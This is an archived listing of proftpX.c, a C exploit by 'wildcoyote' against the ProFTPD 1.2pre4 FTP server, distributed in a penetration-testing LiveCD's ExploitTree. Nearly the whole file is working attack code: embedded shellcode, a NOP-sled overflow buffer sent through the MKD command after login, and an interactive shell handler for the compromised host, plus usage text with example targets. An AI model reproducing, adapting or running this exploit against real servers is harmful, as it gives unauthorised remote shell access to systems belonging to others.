Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / ftp / proftpd / proftpX.c < prev next >

Wrap

C/C++ Source or Header | 2005-02-12 | 5KB | 182 lines

/* ProFTPD 1.2pre4 Remote Buffer Overflow Xploit by wildcoyote@coders-pt.org Advisorie (from www.securityfocus.com): The vulnerability in 1.2pre1, 1.2pre3 and 1.2pre3 is a remotely exploitable buffer overflow, the result of a sprintf() in the log_xfer() routine in src/log.c. The vulnerability in -> 1.2pre4 <- is a mkdir overflow. The name of the created path can not exceed 255 chars. -> UNRELEASED! DISTRIBUTE! <- :] heh I'm almost sure that no1 coded a exploit against this version of ProFtpd/using the same buffer overflow. */ #include <netdb.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <unistd.h> #include <string.h> #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <errno.h> #define DELAY 2 // wait 2 secondz before sending each command :] #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 255 #define RETURN_ADDRESS 0xbffff550 #define NOP 0x90 char shellcode[] = "\x90\x90\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\xb0\x17\xcd\x80" "\x31\xc0\x31\xdb\xb0\x2e\xcd\x80\xeb\x4f\x31\xc0\x31\xc9\x5e\xb0" "\x27\x8d\x5e\x05\xfe\xc5\xb1\xed\xcd\x80\x31\xc0\x8d\x5e\x05\xb0" "\x3d\xcd\x80\x31\xc0\xbb\xd2\xd1\xd0\xff\xf7\xdb\x31\xc9\xb1\x10" "\x56\x01\xce\x89\x1e\x83\xc6\x03\xe0\xf9\x5e\xb0\x3d\x8d\x5e\x10" "\xcd\x80\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89" "\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xac\xff\xff\xff"; int openhost(char *host,int port) { int sock; struct sockaddr_in addr; struct hostent *he; he=gethostbyname(host); if (he==NULL) return -1; sock=socket(AF_INET, SOCK_STREAM, getprotobyname("tcp")->p_proto); if (sock==-1) return -1; memcpy(&addr.sin_addr, he->h_addr, he->h_length); addr.sin_family=AF_INET; addr.sin_port=htons(port); if(connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1) sock==-1; return sock; } void sends(int sock,char *buf) { write(sock,buf,strlen(buf)); } void own3dshell(int sock) { char buf[1024]; fd_set rset; int i; while (1) { FD_ZERO(&rset); FD_SET(sock,&rset); FD_SET(STDIN_FILENO,&rset); select(sock+1,&rset,NULL,NULL,NULL); if (FD_ISSET(sock,&rset)) { i=read(sock,buf,1024); if (i <= 0) { printf("The connection was closed!\n"); printf("Exiting...\n\n"); exit(0); } buf[i]=0; puts(buf); } if (FD_ISSET(STDIN_FILENO,&rset)) { i=read(STDIN_FILENO,buf,1024); if (i>0) { buf[i]=0; write(sock,buf,i); } } } } void own(char *username, char *password, char *writable_dir, char *host, int port, int offset) { char buf[512], *buf_ptr, *ptr; long *addr_ptr, addr; int bsize=DEFAULT_BUFFER_SIZE+100, sock, i; printf("Trying to connect to %s [%d]...",host,port); sock=openhost(host,port); if (sock==-1) { printf("FAILED\n"); printf("Exiting...\n\n"); exit(-1); } printf("SUCCESSFULL\n"); printf("Sending username (%s)...",username); snprintf(buf,sizeof(buf),"USER %s\n",username); sends(sock,buf); printf("DONE\n"); bzero(buf,strlen(buf)); sleep(DELAY); printf("Sending password ("); for(i=0;i<strlen(password);i++) printf("*"); printf(")..."); snprintf(buf,sizeof(buf),"PASS %s\n",password); sends(sock,buf); printf("DONE\n"); bzero(buf,strlen(buf)); sleep(DELAY); printf("CWD %s...",writable_dir); snprintf(buf,sizeof(buf),"CWD %s\n",writable_dir); sends(sock,buf); printf("DONE\n"); bzero(buf,strlen(buf)); sleep(DELAY); printf("Allocating mem for buffer overflow...\n"); if (!(buf_ptr=malloc(bsize))) { printf("Couldn't allocate memory!\n"); printf("Exiting...\n\n"); exit(-1); } printf("Preparing buffer...\n"); addr=RETURN_ADDRESS-offset; ptr=buf_ptr; addr_ptr=(long *) ptr; for (i=0;i<bsize; i+=4) *(addr_ptr++)=addr; for (i=0;i< bsize/2;i++) buf_ptr[i]=NOP; ptr=buf_ptr+((bsize/2)-(strlen(shellcode)/2)); for (i=0;i<strlen(shellcode);i++) *(ptr++)=shellcode[i]; buf_ptr[bsize-1]='\0'; snprintf(buf,sizeof(buf),"MKD %s\n",buf_ptr); printf("Sending evil'code...\n"); sends(sock,buf); sleep(DELAY); printf("Oh k! If all went well, we should have a suid'shell wainting for uz ;)\n"); printf("Enjoy...\n"); own3dshell(sock); } main(int argc, char *argv[]) { printf("\n\tProFtpd 1.2pre4 Remote Xploit by wildcoyote@coders-pt.org\n\n"); if (argc<5) { printf("Sintaxe: %s <username> <password> <writable dir> <host> [port] [offset]\n",argv[0]); printf("Example:\n\n"); printf(" -> If you have a account on the box <-\n"); printf(" %s wildcoyote my_pass /tmp biatx.userfriendly\n",argv[0]); printf(" -> Anonymous access on tha box <-\n"); printf(" %s anonymous whatever@ /incoming 192.168.0.2\n\n",argv[0]); printf("If thiz doesn't bind tha own3d'shell, try a offset between 0-3\n"); printf("Regardz, wildcoyote@coders-pt.org\n\n"); } else if (argc==5) own(argv[1],argv[2],argv[3],argv[4],21,DEFAULT_OFFSET); else if (argc==6) own(argv[1],argv[2],argv[3],argv[4],atoi(argv[5]),DEFAULT_OFFSET); else own(argv[1],argv[2],argv[3],argv[4],atoi(argv[5]),atoi(argv[6])); } /* www.hack.co.za [3 July 2000]*/